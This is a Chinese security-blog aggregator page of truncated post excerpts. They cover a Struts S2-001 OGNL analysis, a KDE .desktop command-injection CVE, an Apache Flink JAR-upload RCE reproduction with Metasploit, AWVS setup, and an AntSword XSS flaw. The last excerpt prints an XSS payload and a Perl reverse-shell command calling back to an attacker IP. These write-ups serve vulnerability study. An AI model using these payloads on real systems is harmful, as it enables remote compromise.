漏洞

S2-001漏洞分析

前提是你 提交于 2019-11-26 17:19:47
S2-001漏洞分析 1.漏洞描述 该漏洞因用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。 2.影响版本 Struts 2.0.0 - Struts 2.0.8 3.漏洞详情 首先写一个漏洞利用环境,代码结构如下: LoginAction.java源码: package com.cy.demo.action; import com.opensymphony.xwork2.ActionSupport; public class LoginAction extends ActionSupport{ private static final long serialVersionUID = 1L; private String username ; private String password ; public String getUsername(){ return this.username; } public String getPassword(){ return this.password; } public

KDE4/5 命令执行漏洞 (CVE-2019-14744) 简析

为君一笑 提交于 2019-11-26 17:12:31
作者: HACHp1@知道创宇404实验室 日期: 2019/08/08 原文链接 漏洞简介 KDE Frameworks是一套由KDE社群所编写的库及软件框架,是KDE Plasma 5及KDE Applications 5的基础,并使用GNU通用公共许可证进行发布。其中所包含的多个独立框架提供了各种常用的功能,包括了硬件集成、文件格式支持、控件、绘图功能、拼写检查等。KDE框架目前被几个Linux发行版所采用,包括了Kubuntu、OpenMandriva、openSUSE和OpenMandriva。 2019年7月28日Dominik Penner(@zer0pwn)发现了KDE framework版本<=5.60.0时存在命令执行漏洞。 2019年8月5日Dominik Penner在Twitter上披露了该漏洞,而此时该漏洞还是0day漏洞。此漏洞由KDesktopFile类处理.desktop或.directory文件的方式引起。如果受害者下载了恶意构造的.desktop或.directory文件,恶意文件中注入的bash代码就会被执行。 2019年8月8日,KDE社区终于在发布的更新中修复了该漏洞;在此之前的三天内,此漏洞是没有官方补丁的。 一些八卦 在Dominik Penner公开此漏洞时,并没有告诉KDE社区此漏洞

应用安全的重要性!再怎么强调都不过分的5大理由

旧巷老猫 提交于 2019-11-26 16:47:37
本文作者 John Montesi 是 B2B 及 SaaS 行业专家,喜欢用可爱的语言解释复杂的概念。他相信内容营销是大势所趋,有时也相信鬼故事,虽然拿不出什么证明。 在当今的商业领域,应用安全的重要性已经成为影响公司品牌感知,甚至盈亏的首要因素。然而,不知为何,尽管数字化领域呈现指数型增长,安全协议却很少回应云或其他软件环境中存储的重要信息量。 在近期一篇名为 《为什么应用安全是商业准则》 的白皮书中,IDG 与 Veracode 强调了应用安全(AppSec)对于企业安全格局如此重要的五大原因: 1. 公司合并导致漏网之鱼 去年,公司合并数量达到七年来的峰值,这既是企业合作的一种方式,也代表了企业们奋力突出重围的勃勃雄心。然而,激动之余,有一个重要的细节却常常被人们忽略。白皮书中指出,典型的市值 5 亿美元(或以上)的企业,开发了近 3100 款应用,占其总体应用框架的 40% 。如此规模的两三个企业如果合并,很可能会有数百款应用漏掉检查,产生安全裂缝。如果你无法找到这些安全漏洞,又谈何修复它呢?因此,全局的 应用安全 必须考虑所有应用。 ###2. 这是一场数字游戏 这是一个老掉牙的悲伤故事:一些负责次要任务的次要应用导致了大规模的安全漏洞。即便是合并之前,许多公司通常会依赖数千款应用开展业务。如果其中有一个应用的安全措施不到位,专门的安全测试可能也无法查出来。其实

【360补天计划】记第一次漏洞提交

扶醉桌前 提交于 2019-11-26 16:13:29
前言: 即将于8月底进入广州大学方班开始研究生学习,遂提前开始学习网安方面的知识,然后发现了360的补天计划,正好之前进行测试的时候被老师提醒随便测试别人的网站不合适,这样一来,就有众多网站可以随便测试! 网址:https://www.butian.net/ 还有其他相关的漏洞提交网站:比如 教育行业漏洞报告平台 一、网站白帽子注册: 在官网,直接注册即可 二、查找漏洞: 在项目大厅有三类SRC:专属SRC、企业SRC、公益SRC。 因为暂时技术能力有限,所以是在公益SRC找网站,进行测试,最终找到 一个找漏洞。 三、漏洞提交: 当找到漏洞的时候,就可以在平台提交漏洞,就目前我的经验所得,一般情况下,需要截图和漏洞造成的结果,这两部分最重要,描述就按正常的发现漏洞流程写即可。 然后就是漏洞审核时长,实际上比较长,所以提交之后就不用管了,下周再看就行,然后如果审核不通过,会有审核意见,也就是提示,根据提示再稍加修改,就能过审了。 提交坑的补充:漏洞造成的结果!!!一定要在漏洞报告写出来,比如 泄露的密码、个人信息等等,这样才能表示漏洞确实存在!比写复现方式更有说服力。 来源: https://www.cnblogs.com/wayne-tao/p/11216964.html

信息安全学习文章(Web-Security-Learning)

ぃ、小莉子 提交于 2019-11-26 16:12:00
由于自己很懒,很多知识点都没有自己去整理,想着自己不整理总有大佬总结整理了,所以我这里就将我平时看到的好的文章链接发出来,用来大家学习。资料全为转载仅供学习,如有侵权请告知立即删除。 我会不间断更新,本次更新时间为:2019/3/8 1. 本次新收录的文章 一套实用的渗透测试岗位面试题 XSS漏洞解析与挖掘 Getshell姿势文章大集合 巧妙地绕过CSP:欺骗CSP执行任意代码 Andorid-APP 安全测试(一) Andorid-APP 安全测试(二) Andorid-APP 安全测试(三) Andorid-APP 安全(四)之流量分析与内外存储 Android-APP 安全(五)之android取证-文件系统与数据结构 2. 文章汇总 1. sql注入 2. xss XSS BYPASS备忘录 那些年我们一起学XSS 如何对 JavaScript 引擎进行 Fuzzing JavaScript源码审计(一) XSS漏洞解析与挖掘 3. csrf 4. 上传 Upload-labs 20关通关笔记 5. 代码执行/命令执行 6. 文件包含 7. 逻辑漏洞 8. 应急响应 1. Windows应急响应 windows 应急流程及实战演练 Windows 系统安全事件应急响应 2. Linux应急响应 Linux 应急响应流程及实战演练 9. 前端安全 1. ssi注入

网被劫持都是哪些原因所致?

穿精又带淫゛_ 提交于 2019-11-26 12:47:39
  站长朋友们是一定都遇到过被黑被劫持的经历,对于认认真真做站的朋友来说,好不容易做出了一点成绩,一劫持就又回到解放前了,也因此,网络劫持的问题也是日益严峻。下面分享常见的网站被黑被劫持的手段有哪些?如何防范与修复这些风险?   检查方法,使用IIS7的网站监控功能,可以检测网站是否被劫持、域名是否被墙、DNS污染检测、网站打开速度检测、网站是否被黑、被***、被改标题、被挂黑等信息,是在做网站管理时的必要工具。   然后我们来看看被黑、被劫持的几种主要风险漏洞来源::   网站风险(上传、注入、GetShell)   主要因为站点使用自行开发或使用的开源程序存在上传、注入、XSS、越权、私密信息泄露等漏洞,被***发现后利用上述站点的漏洞***获得了站的shell,甚至是服务器的管理员权限,这类漏洞就需要开发人员有足够多的安全意识,必要的情况下可以使用一些第三方安全监控程序排查或请国内的知名众测、安全检测公司进行检测。   软件风险   指的是服务器上的第三方软件的风险,例如FLASH、FTP程序等导致的漏洞,特别是使用了一些破解程序的站点。针对这类情况希望站长可以使用正版程序或自行评估破解程序的安全系数后使用,并且能够及时关注漏洞预警情况,对于大众化的软件风险目前的云服务商会先行出云补丁进行修复。   系统风险   操作系统级别的漏洞

Acunetix Web Vulnerability Scanner v12.0安装和使用

喜你入骨 提交于 2019-11-26 11:58:48
该软件下载地址:https://www.jb51.net/softs/659643.html Acunetix Web Vulnerability Scanner(简称:Acunetix WVS)是来自国外的一款权威、专业的商业级Web漏洞扫描程序。 它是领先的网络漏洞扫描器,被广泛称赞包括最先进的 sql 注入和 xss 黑匣子扫描技术。它会自动抓取您的网站,并执行黑匣子和灰色框黑客技术,发现危险的漏洞,可能会危及您的网站和数据。 该软件能够针对sql 注入、xss、xxxe、ssrf、主机头注入和4500其他web 漏洞进行测试,具有最先进的扫描技术,可产生尽可能最少的误报。 通过内置的漏洞管理功能简化web 应用程序安全过程,这些功能可帮助您确定漏洞解决的优先级并进行管理。新版本集成了漏洞管理功能来扩展企业全面管理、优先级和控制漏洞威胁的能力, Acunetix 12重新设计的基于Web的用户界面,让用户使用和管理更加容易。此外,Acunetix 12也可以被多个用户使用。 1、下载软件压缩包文件,首先点击“Acunetix.Web.12.0.180911134.Retail.exe”安装最新版原程序 2、阅读并同意软件安装协议 3、设置登录信息,包括邮箱地址以及登录密码,Email和pwd在安装后,扫描时登录https://localhost:3443用 密码要包含:字母

「漏洞预警」Apache Flink 任意 Jar 包上传导致远程代码执行漏洞复现

自作多情 提交于 2019-11-26 09:55:56
漏洞描述 Apache Flink是一个用于分布式流和批处理数据的开放源码平台。Flink的核心是一个流数据流引擎,它为数据流上的分布式计算提供数据分发、通信和容错功能。Flink在流引擎之上构建批处理,覆盖本地迭代支持、托管内存和程序优化。近日有安全研究人员发现apache flink允许上传任意的jar包从而导致远程代码执行。 漏洞级别 高危 影响范围 Apache Flink <=1.9.1 漏洞复现 首先下载Apache Flink 1.9.1安装包并进行解压,之后进入bin文件夹内运行./start-cluster.sh启动环境,浏览器访问http://ip:8081验证是否成功,如下图所示: 接着使用生成jar的木马文件并进行上传,如下图所示: 开启msf进行监听并点击提交,可看到成功返回一个shell。如下图所示: 修复建议 建议用户关注Apache Flink官网,及时获取该漏洞最新补丁。 临时解决建议 设置IP白名单只允许信任的IP访问控制台并添加访问认证。 漏洞检测方法 目前github已有相应公开的检测poc,如下图所示: 链接: https://github.com/LandGrey/flink-unauth-rce ​ 更多Flink相关博文欢迎关注实时流式计算 本文由博客一文多发平台 OpenWrite 发布! 来源: https://www

Web通用型漏洞——文件

折月煮酒 提交于 2019-11-26 05:39:36
文件上传 0X00 概述 文件上传漏洞是用户上传了一个可执行的脚本文件,并通过该脚本文件获得服务端可执行命令的能力。该文件上传功能本身没有问题,有问题的是上传成功后,服务端如何处理、如何执行解析该脚本文件。如果服务端的处理逻辑不够安全,就会导致上传的文件被web容器解析执行,从而造成严重的后果。   文件上传可以上传图片,上传相册、上传附件、添加新闻图片、添加背景图片等等   文件漏洞分类:     代码层:开发者对安全意识的不足,或者是在对文件上传的校验不严谨造成的     应用层:Web容器漏洞、配置不当等等 0X01 常见的文件上传绕过漏洞 1.前端绕过 客户端JS验证:上传文件时提示只允许上传.jpg/.png/.jpeg后缀名的文件。 绕过方法:1.通过修改脚本文件,添加上传文件的文本类型后缀名      2.删除JS验证脚本的调用,让其不能对上传文件进行校验      3.修改上传文件的类型后缀名进行绕过,例如:webshell.php改为webshell.jpg,当点击上传时,burp抓包进行修改,以便服务器能够正常解析 2.服务端绕过 服务端的MIME验证:MIME是描述消息内容类型的因特网标准,即Content-type内容 绕过方法:修改Content-type内容,例如:上传Content—type:text/php --> Content--type

蚁剑xss漏洞,获取者shell

偶尔善良 提交于 2019-11-26 03:38:42
今日在github上看到蚁剑暴露了一个xss漏洞,自己也经常使用蚁剑。同时在freebuf上也有一篇文章,关于蚁剑漏洞的。闲着没事测试了一波。 一、漏洞成因 蚁剑shell远程连接失败时,蚁剑会返回错误信息,但因为使用的是html解析,导致xss漏洞。 用过蚁剑的童靴都清楚,当我们远程连接写好的webshell的时候,有时候可能因为shell书写错误或者链接填写不当的时候,会出现大堆的错误代码。 该信息并没有进行 XSS 保护,因此能够利用 js 调用 perl 便可反弹***者的shell 很多时候我们不去注意,但这里恰恰就是漏洞利用点。(漏洞往往就在你的眼皮地下,你只要向下看看就能找到。可惜我们只向前看,不向下看。) 二、漏洞验证 鉴于本人对js没有深入了解,只懂得些皮毛。这里就直接引用别人写好的shell了 (1)验证xss漏洞的存在 <?php header('HTTP/1.1 500 <img src=# onerror=alert(1)>');?> Head()函数,向客户端发送原始的 HTTP 报头。 当蚁剑远程连接shell的时候就会触发弹框。 (2)反弹***者shell require('child_process').exec('perl -e \'use Socket;$i="192.168.80.151";$p=1002;socket(S,PF_INET